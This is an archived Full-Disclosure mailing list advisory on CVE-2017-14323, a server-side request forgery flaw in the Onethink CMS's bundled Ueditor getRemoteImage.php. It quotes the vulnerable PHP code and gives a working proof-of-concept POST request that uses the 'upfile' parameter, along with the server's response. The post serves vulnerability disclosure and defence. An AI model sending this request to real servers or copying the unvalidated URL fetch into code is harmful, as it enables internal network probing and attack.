| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <201804042106133614208@baimaohui.net>+3FCD53AD51BD698A
Date: Wed, 4 Apr 2018 21:06:13 +0800
From: "service@...maohui.net" <service@...maohui.net>
To: fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] SSRF(Server Side Request Forgery) in Onethink All version (CVE-2017-14323)
# SSRF(Server Side Request Forgery) in Onethink All version (CVE-2017-14323)
The Onethink is an open source CMS(Content Management System).This system is based on the Thinkphp3.2 development framework.
## Product Download: http://www.onethink.cn
## Vulnerability Type:SSRF(Server Side Request Forgery)
## Attack Type : Remote
## Vulnerability Description
Onethink uses a Ueditor editor with a flawed version that causes the SSRF vulnerability to occur.
The vulnerability code(/Public/static/ueditor/php/getRemoteImage.php):
$uri = htmlspecialchars( $_POST[ 'upfile' ] );
$uri = str_replace( "&" , "&" , $uri );
getRemoteImage( $uri,$config );
//echo($uri);
/**
* 远程抓取
* @param $uri
* @param $config
*/
function getRemoteImage( $uri,$config)
{
//忽略抓取时间限制
set_time_limit( 0 );
//ue_separate_ue ue用于传递数据分割符号
$imgUrls = explode( "ue_separate_ue" , $uri );
$tmpNames = array();
foreach ( $imgUrls as $imgUrl ) {
//http开头验证
if(strpos($imgUrl,"http")!==0){
array_push( $tmpNames , "error" );
continue;
}
//echo($imgUrl);
//获取请求头
$heads = get_headers( $imgUrl ); //This is a blind ssrf
//死链检测
if ( !( stristr( $heads[ 0 ] , "200" ) && stristr( $heads[ 0 ] , "OK" ) ) ) {
array_push( $tmpNames , "error" );
continue;
}
//格式验证(扩展名验证和Content-Type验证)
$fileType = strtolower( strrchr( $imgUrl , '.' ) );
if ( !in_array( $fileType , $config[ 'allowFiles' ] ) || stristr( $heads[ 'Content-Type' ] , "image" ) ) {
array_push( $tmpNames , "error" );
continue;
}
//var_dump($tmpNames);
//打开输出缓冲区并获取远程图片
ob_start();
$context = stream_context_create(
array (
'http' => array (
'follow_location' => false // don't follow redirects
)
)
);
//请确保php.ini中的fopen wrappers已经激活
readfile( $imgUrl,false,$context); //vulnerability is here,request any http(s) url
$img = ob_get_contents();
ob_end_clean();
## Exploit
Request Content:
POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Connection: keep-alive
upfile=https://www.google.com/?%23.jpg
Response Content:
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Content-Length: 110
{'url':'upload/43361505134158.jpg','tip':'远程图片抓取成功!','srcUrl':'http://www.baidu.com/?#.jpg'}
modify the above upfile parameter,example:
request http protocol: upfile=http://www.google.com
request https protocol: upfile=https://www.google.com
This vulnerability only use http、https protocol
this vulnerability trigger need allow\_url\_fopen option is enable in php.ini,allow\_url\_fopen option defualt is enable.
## Versions
Onethink all version
## Impact
SSRF(Server Side Request Forgery) in Onethink V1.0 and V1.1 version allow remote attackers to information detection,internal network server attack.
## Credit
This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14323
service@...maohui.net
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists